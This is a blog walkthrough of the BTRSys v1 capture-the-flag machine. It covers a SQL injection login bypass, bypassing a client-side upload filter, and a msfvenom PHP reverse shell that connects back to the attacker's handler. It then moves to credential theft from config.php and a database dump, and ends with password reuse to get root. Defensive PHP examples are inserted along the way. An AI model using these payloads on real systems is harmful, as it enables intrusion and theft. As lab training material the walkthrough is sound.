Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

BTRSys v1: CTF walkthrough

Introduction

Name: BTRSys: v1
Release date: 8 Jun 2017

Author: ismailonderkaya
Series: BTRSys
VM link: https://www.vulnhub.com/entry/btrsys-v1,195/


Recognition

We can find the IP address of the vulnerable system with arp-scan.

[Image: arp-scan output (btrsys_v1_ctf_walkthrough_arp_scan.png)]

We scan the targeted system with nmap.

root@kali:~/Desktop# nmap 192.168.1.47 -p- -A -O -T5 --reason

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-15 16:19 CEST
Warning: 192.168.1.47 giving up on port because retransmission cap hit (2).
Nmap scan report for yoda.home (192.168.1.47)
Host is up, received arp-response (0.012s latency).
Not shown: 65377 closed ports, 155 filtered ports
Reason: 65377 resets and 155 no-responses
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   12.07 ms yoda.home (192.168.1.47)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 244.95 seconds
root@kali:~/Desktop#

We can log in to the FTP service anonymously, but its directory is empty, so only port 80 will be used.


Login page

Weirdly, gobuster didn’t find the login.php page, so I used nikto.

root@kali:~/Desktop# nikto -host 192.168.1.47
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.47
+ Target Hostname:    192.168.1.47
+ Target Port:        80
+ Start Time:         2017-10-15 16:32:11 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-10-15 16:33:38 (GMT2) (87 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The login.php page is a basic login page, but two client-side restrictions need to be bypassed.

<script type="text/javascript">

function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    var str=user.substring(user.lastIndexOf("@")+1,user.length);

    if((pwd == "'")){
        alert("Hack Denemesi !!!");

    }
    else if (str!="btrisk.com"){
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");

    }    
    else{

      document.loginform.submit();
    }
}
</script>

The username must end with “@btrisk.com” (the script compares everything after the last “@” with that domain) and the password can’t be a single quote on its own. All of that sounds like an HTTP form vulnerable to SQL injection. After different tries, this one seems to work for me: a’ or 1=1;#
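A defensive counterpart, added here and not taken from the VM or the walkthrough: the same login written with a mysqli prepared statement in PHP, matching the VM's config.php. The table and column names come from the database dump later in the post; that login.php built its query by string concatenation is an assumption, since the page only shows that the bypass succeeds.

```php
<?php
// Added example, not code from the BTRSys VM or the walkthrough: the login
// query written with a mysqli prepared statement. Assumed: $con comes from
// the VM's config.php, the table is `user` with Kullanici_Adi and Parola
// columns (as in the dump), and login.php originally built its SQL by
// concatenating the POSTed user/pwd fields (the page shows only that
// "a' or 1=1;#" logs in, not the server code).
require_once 'config.php';   // defines $con (mysqli)

function login_user(mysqli $con, string $user, string $pwd): bool
{
    // The domain rule from control() enforced again on the server, since the
    // JavaScript check is skipped by anyone who posts the form directly.
    $at = strrpos($user, '@');
    if ($at === false || substr($user, $at + 1) !== 'btrisk.com') {
        return false;
    }
    // A placeholder keeps $user as data: a quote or "or 1=1" inside it can
    // no longer change the structure of the statement.
    $stmt = $con->prepare(
        'SELECT Parola FROM user WHERE Kullanici_Adi = ? LIMIT 1'
    );
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $stmt->bind_result($stored);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return false;
    }
    // The VM keeps Parola in clear text; here the column is assumed to hold
    // a password_hash() value so the comparison is salted and constant-time.
    return password_verify($pwd, $stored);
}

if (!login_user($con, $_POST['user'] ?? '', $_POST['pwd'] ?? '')) {
    http_response_code(401);
    exit('Login failed');
}
```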

Once logged in, we have access to a file upload form. I hope this input is sanitised.


From JPG to reverse shell

Once more, this input has only one restriction: we can upload only JPG, GIF or PNG files.

<script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        document.myform.submit();
    }else{
        // message
        alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
        return false;


    }
}
</script>

The problem is that this check is done only on the client side, in JavaScript. So, if we intercept the upload request with Burp Suite and change the file extension to .php, we will be able to upload a PHP reverse shell.
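An added example, not the VM's own upload handler: what the check in getFile() looks like when done on the server in PHP, where a proxy cannot alter it. The field name dosya and the uploads directory are taken from the page; that Apache is configured not to execute PHP from that directory is an assumption stated in the code.

```php
<?php
// Added example, not the VM's upload handler: the server-side validation that
// the client-side getFile() check above cannot provide. Assumed: the form
// field is still named "dosya", files land in /var/www/html/uploads as on the
// VM, and that directory is configured so Apache never executes PHP from it.
// Needs PHP 7.1+ (nullable return type, random_bytes()).
define('UPLOAD_DIR', '/var/www/html/uploads');

function allowed_types(): array
{
    // extension => MIME type the file content must actually have
    return ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
}

function validate_upload(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $allowed = allowed_types();
    // Extension from the client-supplied name, lowercased. pathinfo() takes the
    // last extension only, so "x.php.jpg" yields "jpg" and must pass the rest.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }
    // Content check: the MIME type sniffed from the bytes must match the
    // extension. A PHP payload renamed to .jpg, as in the walkthrough, is
    // detected as text/x-php or text/plain here and is rejected.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    // getimagesize() parses the image header and fails on anything else.
    return @getimagesize($file['tmp_name']) === false ? null : $ext;
}

$ext = validate_upload($_FILES['dosya'] ?? []);
if ($ext === null) {
    http_response_code(400);
    exit('Only JPG, PNG and GIF images are accepted.');
}
// Server-chosen name: the client's filename never reaches the filesystem.
$dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($_FILES['dosya']['tmp_name'], $dest)) {
    http_response_code(500);
    exit('Upload failed.');
}
echo 'Stored as ' . htmlspecialchars(basename($dest));
```

Keeping the upload directory non-executable (for example with an Apache directive that disables the PHP handler there) is the second half of the fix, since the content checks alone do not stop a web shell that is also a valid image.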

We generate a PHP reverse shell saved as rshell.jpg.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.107 -o rshell.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
Saved as: rshell.jpg
root@kali:~/Desktop#

We configure our Metasploit handler.

root@kali:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.107:1337 
msf exploit(handler) >

Finally, we configure Burp Suite to intercept the outgoing traffic, upload the rshell.jpg file and change the extension of our reverse shell in the intercepted request.

[Image: changing the rshell extension in Burp Suite (btrsys_v1_ctf_walkthrough_burpsuite_change_rshell_extension.png)]

Now, we have a reverse shell.

[Image: low-privilege reverse shell (btrsys_v1_ctf_walkthrough_low_reverse_shell.png)]

Privilege escalation

First of all, we start a shell.

meterpreter > shell
Process 3377 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@BTRsys1:/var/www/html/uploads$ export TERM=linux
export TERM=linux
www-data@BTRsys1:/var/www/html/uploads$

Then we will take a look at this interesting file: config.php.

www-data@BTRsys1:/var/www/html/uploads$ cd ..
cd ..
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
  {
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
  }
/////////////////////////////////////////////////////////////////////////////////////////
?>

www-data@BTRsys1:/var/www/html$

We found MySQL credentials.

Let’s use them and explore the MySQL database “deneme”.

www-data@BTRsys1:/var/www/html$ mysql -uroot -p -Ddeneme
mysql -uroot -p -Ddeneme
Enter password: toor

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 118197
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
+------------------+
| Tables_in_deneme |
+------------------+
| user             |
+------------------+
1 row in set (0.00 sec)

mysql>

Now, we will show the content of this table.

mysql> select * from user;
select * from user;
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
|  1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | cdmir@btrisk.com | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
+----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+
2 rows in set (0.00 sec)

mysql>

Two users share the same password, so let’s try it for the root account.

mysql> quit
quit
Bye
www-data@BTRsys1:/var/www/html$ su root
su root
Password: asd123***

root@BTRsys1:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@BTRsys1:/var/www/html#

We have root access to this system.

[Image: rooted (btrsys_v1_ctf_walkthrough_rooted.png)]
